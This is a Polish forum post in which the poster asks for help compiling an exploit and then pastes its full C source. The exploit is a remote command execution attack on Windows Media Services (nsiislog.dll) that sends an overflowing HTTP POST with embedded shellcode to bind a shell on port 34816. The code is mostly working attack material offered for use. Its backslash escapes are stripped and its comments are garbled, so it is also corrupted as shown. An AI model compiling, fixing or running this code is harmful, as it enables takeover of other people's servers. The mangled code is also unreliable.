Zaden program nie skutkuje to moze ktos mi pomoze skompilowac nastepujacego exploita:
// Windows Media Services Remote Command Execution #2
// v. 1.0 beta
// Š firew0rker //tN [The N0b0D1eS]
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#ifdef WIN32
#include <winsock.h>
#pragma comment(lib, "wsock32")
#else
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <unistd.h>
#define SOCKET int
#define DWORD uint32_t
#define ULONG unsigned long
#define INVALID_SOCKET -1
#define SOCKET_ERROR -1
#define closesocket close
#endif
char shellcode[]=
//"x90x90x90x90x90x90x90xCC" //¤Â&ï⤪¨
"xebx02xebx05xe8xf9xffxff"
"xffx5bx81xebx4dx43x22x11"
"x8bxc3x05x66x43x22x11x66"
"xb9x15x03x80x30xfbx40x67"
"xe2xf9x33xa3xf9xfbx72x66"
"x53x06x04x04x76x66x37x06"
"x04x04xa8x40xf6xbdxd9xea"
"xf8x66x53x06x04x04xa8x93"
"xfbxfbx04x04x13x91xfaxfb"
"xfbx43xcdxbdxd9xeaxf8x7e"
"x53x06x04x04xabx04x6ex37"
"x06x04x04xf0x3bxf4x7fxbe"
"xfaxfbxfbx76x66x3bx06x04"
"x04xa8x40xbaxbdxd9xeaxf8"
"x66x53x06x04x04xa8xabx13"
"xccxfaxfbxfbx76x7ex8fx05"
"x04x04xabx93xfaxfaxfbxfb"
"x04x6ex4bx06x04x04xc8x20"
"xa8xa8xa8x91xfdx91xfax91"
"xf9x04x6ex3bx06x04x04x72"
"x7exa7x05x04x04x9dx3cx7e"
"x9fx05x04x04xf9xfbx9dx3c"
"x7ex9dx05x04x04x73xfbx3c"
"x7ex93x05x04x04xfbxfbxfb"
"xfbx76x66x9fx05x04x04x91"
"xebxa8x04x4exa7x05x04x04"
"x04x6ex47x06x04x04xf0x3b"
"x8fxe8x76x6ex9cx05x04x04"
"x05xf9x7bxc1xfbxf4x7fx46"
"xfbxfbxfbx10x2fx91xfax04"
"x4exa7x05x04x04x04x6ex43"
"x06x04x04xf0x3bxf4x7ex5e"
"xfbxfbxfbx3cx7ex9bx05x04"
"x04xebxfbxfbxfbx76x7ex9b"
"x05x04x04xabx76x7ex9fx05"
"x04x04xabx04x4exa7x05x04"
"x04x04x6ex4fx06x04x04x72"
"x7exa3x05x04x04x07x76x46"
"xf3x05x04x04xc8x3bx42xbf"
"xfbxfbxfbx08x51x3cx7excf"
"x05x04x04xfbxfaxfbxfbx70"
"x7exa3x05x04x04x72x7exbf"
"x05x04x04x72x7exb3x05x04"
"x04x72x7exbbx05x04x04x3c"
"x7exf3x05x04x04xbfxfbxfb"
"xfbxc8x20x76x7ex03x06x04"
"x04xabx76x7exf3x05x04x04"
"xabxa8xa8x93xfbxfbxfbxf3"
"x91xfaxa8xa8x43x8cxbdxd9"
"xeaxf8x7ex53x06x04x04xab"
"xa8x04x6ex3fx06x04x04x04"
"x4exa3x05x04x04x04x6ex57"
"x06x04x04x12xa0x04x04x04"
"x04x6ex33x06x04x04x13x76"
"xfaxfbxfbx33xefxfbxfbxac"
"xadx13xfbxfbxfbxfbx7axd7"
"xdfxf9xbexd9xeax43x0exbe"
"xd9xeaxf8xffxdfx78x3fxff"
"xabx9fx9cx04xcdxfbxfbx72"
"x9ex03x13xfbxfbxfbxfbx7a"
"xd7xdfxd8xbexd9xeax43xac"
"xbexd9xeaxf8xffxdfx78x3f"
"xffx72xbex07x9fx9cx72xdd"
"xfbxfbx70x86xf3x9dx7axc4"
"xb6xa1x8exf4x70x0cxf8x8d"
"xc7x7axc5xabxbexfbxfbx8e"
"xf9x10xf3x7ax14xfbxfbxfa"
"xfbx10x19x72x86x0bx72x8e"
"x17x70x86xf7x42x6dxfbxfb"
"xfbxc9x3bx09x55x72x86x0f"
"x70x34xd0xb6xf7x70xadx83"
"xf8xaex0bx70xa1xdbxf8xa6"
"x0bxc8x3bx70xc0xf8x86x0b"
"x70x8exf7xaax08x5dx8exfe"
"x78x3fxffx10xf1xa2x78x38"
"xffxbbxc0xb9xe3x8ex1fxc0"
"xb9xe3x8exf9x10xb8x70x89"
"xdfxf8x8ex0bx2ax1bxf8x3d"
"xf4x4cxfbx70x81xe7x3ax1b"
"xf9xf8xbex0bxf8x3cx70xfb"
"xf8xbex0bx70xb6x0fx72xb6"
"xf7x70xa6xebx72xf8x78x96"
"xebxffx70x8ex17x7bxc2xfb"
"x8ex7cx9fx9cx74xfdxfbxfb"
"x78x3fxffxa5xa4x32x39xf7"
"xfbx70x86x0bx12x99x04x04"
"x04x33xfbxfbxfbx70xbexeb"
"x7ax53x67xfbxfbxfbxfbxfb"
"xfaxfbx43xfbxfbxfbxfbx32"
"x38xb7x94x9ax9fxb7x92x99"
"x89x9ax89x82xbaxfbxbex83"
"x92x8fxabx89x94x98x9ex88"
"x88xfbxb8x89x9ex9ax8fx9e"
"xabx89x94x98x9ex88x88xba"
"xfbxfbxacxa8xc9xa4xc8xc9"
"xd5xbfxb7xb7xfbxacxa8xba"
"xa8x94x98x90x9ex8fxbaxfb"
"x99x92x95x9fxfbx97x92x88"
"x8fx9ex95xfbx9ax98x98x9e"
"x8bx8fxfbxacxa8xbaxa8x8f"
"x9ax89x8fx8ex8bxfbx98x97"
"x94x88x9ex88x94x98x90x9e"
"x8fxfbxfbx98x96x9fxfbxe9"
"xc4xfcxffxffx74xf9x75xf7";
const DWORD default_EIP_pos = 9992; //ÂŻÂ&Â&Â&Â&¥¨¥ EIP ¢ ¡ãà (sploit)
const DWORD default_EBX_points_to = 9988; //㧠âĄ&Ă& EBX Â&â&á¥Â&ě& sploit
//const DWORD default_EIP_value = 0x77F8441B; //ÂŻÂ& ĂÂ&ã¤à ¤.¡. JMP EDX, ¢ ¤ ÂÂÂ&Â& áç à ¢ ntdll.dll
const DWORD default_EIP_value = 0x40F01333;
//const default_EDX_points_to = 0x1000; //Ă ÂÂĄ ¯ਣÂ&¤¨Â&Â&á
char *nsiislog_default = "/scripts/nsiislog.dll";
char sploit[default_EIP_pos+4+sizeof(shellcode)+1];
char sploitbuf[sizeof(sploit)*2];
void usage(char* argv[])
{
printf("Dicklamer
"
"We are not responsible for the illegal use of this software.n"
"Description: Binds shell to port 34816 (or higher if port busy).n"
"Usage: "
"%s target [-p target_port] [-r /renamed_scripts/renamed_nsiislog.dll]n"
"Supported target(s):n"
"Windows versionttttnsiislog.dll versionn"
"------------------------------------------------------------n"
"2000 [5.00.2195] server rus.tt4.1.0.3917n", argv[0]);
exit(0);
}
int main(int argc, char* argv[])
{
#ifdef WIN32
WSADATA wsaData;
#endif
int target_port = 80;
char *nsiislog = nsiislog_default;
int nArgIndex;
if (argc<2) usage(argv);
nArgIndex = 1;
while ((nArgIndex < argc)&&(strlen(argv[nArgIndex])>=2)&&(argv[nArgIndex][0]=='-'))
{
switch (argv[nArgIndex++][1])
{
case 'p':
case 'P':
target_port = atoi(argv[nArgIndex++]);
continue;
case 'r':
case 'R':
nsiislog = argv[nArgIndex++];
continue;
default:
usage(argv);
}
}
try {
#ifdef WIN32
WSAStartup(0x0101, &wsaData);
#endif
SOCKET s = socket(AF_INET,SOCK_STREAM,0);
if (s == INVALID_SOCKET) throw("No socket");
sockaddr_in addr;
//.¯।¥Â&ďĄ& ¤à á¢ ÂŞ
ULONG iaddr = inet_addr(argv[1]);
if (iaddr == INADDR_NONE) {//.¤à - ¨Â&ĂŻÂĄĂ ÂŞ
hostent *ph = gethostbyname(argv[1]);
if (!ph) throw("Cant resolve hostname");
memcpy(&addr.sin_addr.s_addr,ph->h_addr_list[0],sizeof(in_addr));
} else {//.¤à - IP
memcpy(&addr.sin_addr.s_addr,&iaddr,4);
};
addr.sin_family = AF_INET;
addr.sin_port = htons(target_port);
int sizeofaddr=sizeof(addr);
char *req = "MX_STATS_LogLine: ";
strcpy(sploit, req);
memset(sploit+strlen(sploit), 0xCC, default_EIP_pos-strlen(req));
//memcpy(sploit+default_EDX_points_to, shellcode, sizeof(shellcode)-1/*ã â0*/);
memcpy(sploit+default_EBX_points_to-(sizeof(shellcode)-1)+4, shellcode, sizeof(shellcode)-1/*ã â0*/);
//ÂŻĂ ÂŻÂĄĂ Â&¤¥  EIP, EBX ¡㤥⪠§Ă&â ¯Â&á&ĄÂ¤Â¨Â& DWORD  襣Â& § ÂŻĂ , £¤¥ JZ/JNZ
memcpy(sploit+default_EIP_pos, &default_EIP_value, sizeof default_EIP_value);
/*strcpy(sploit+sizeof(sploit)-11,"BCDEFGHIJK");*/
sploit[sizeof(sploit)-1] = 0;
if (connect(s,(struct sockaddr*)&addr,sizeof(struct sockaddr)) == SOCKET_ERROR) throw("Cant connect host");
sprintf(sploitbuf,
"POST %s HTTP/1.0rn"
"Accept: */*rn"
"User-Agent: NSPlayer/4.1.0.3917rn"
"Content-Type: text/plainrn"
"Content-Length: %irn"
"Pragma: xClientGUID={89f451e0-a491-4346-ad78-4d55aac89045}rn"
"rn%srn",
nsiislog,strlen(sploit),sploit);
int snd=send(s,sploitbuf,strlen(sploitbuf),0);
if (snd == strlen(sploitbuf)) printf("Target exploited.n");
else throw("Cant send exploit");
closesocket(s);
}
catch (char *errmsg)
{
printf("%sn",errmsg);
return -1;
}
catch (int err_n)
{
printf("error %in",err_n);
return err_n;
}
#ifdef WIN32
WSACleanup();
#endif
return 0;
}